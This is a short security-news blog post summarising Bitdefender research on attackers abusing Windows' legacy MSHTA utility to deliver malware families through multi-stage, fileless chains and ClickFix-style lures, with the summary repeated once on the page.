Bitdefender has released new research documenting how attackers continue to abuse Microsoft’s legacy MSHTA utility to deliver malware through stealthy, multi-stage attack chains. The abuse of MSHTA affects both businesses and consumers who run Windows.
Despite Internet Explorer reaching end of support years ago, MSHTA remains enabled by default on Windows systems and continues to be heavily exploited by cybercriminals to execute malicious scripts, retrieve remote payloads, and evade detection using trusted Microsoft-signed processes.
Key findings include:
- MSHTA used to silently deliver multiple malware families, including LummaStealer, Amatera, ClipBanker, PurpleFox, and CountLoader
- Multi-stage, fileless attack chains using HTA scripts, PowerShell, and in-memory payloads to bypass traditional detection tools
- Use of ClickFix-style lures and fake software downloads designed to trick users into manually launching malware infections
The research highlights how legacy Windows utilities continue to pose risks to general users and organizations by providing attackers with trusted tools that blend malicious activity into legitimate system behavior.
You can read the research here: https://www.bitdefender.com/en-us/blog/labs/microsofts-mshta-legacy-malware-windows
Related
This entry was posted on May 19, 2026 at 9:02 am and is filed under Commentary with tags Bitdefender. You can follow any responses to this entry through the RSS 2.0 feed.
You can leave a response, or trackback from your own site.
Microsoft’s Legacy MSHTA Utility Tool Abused in Attacks, Exploited to Deliver Malware
Bitdefender has released new research documenting how attackers continue to abuse Microsoft’s legacy MSHTA utility to deliver malware through stealthy, multi-stage attack chains. The abuse of MSHTA affects both businesses and consumers who run Windows.
Despite Internet Explorer reaching end of support years ago, MSHTA remains enabled by default on Windows systems and continues to be heavily exploited by cybercriminals to execute malicious scripts, retrieve remote payloads, and evade detection using trusted Microsoft-signed processes.
Key findings include:
The research highlights how legacy Windows utilities continue to pose risks to general users and organizations by providing attackers with trusted tools that blend malicious activity into legitimate system behavior.
You can read the research here: https://www.bitdefender.com/en-us/blog/labs/microsofts-mshta-legacy-malware-windows
Share this:
Like this:
Related
This entry was posted on May 19, 2026 at 9:02 am and is filed under Commentary with tags Bitdefender. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.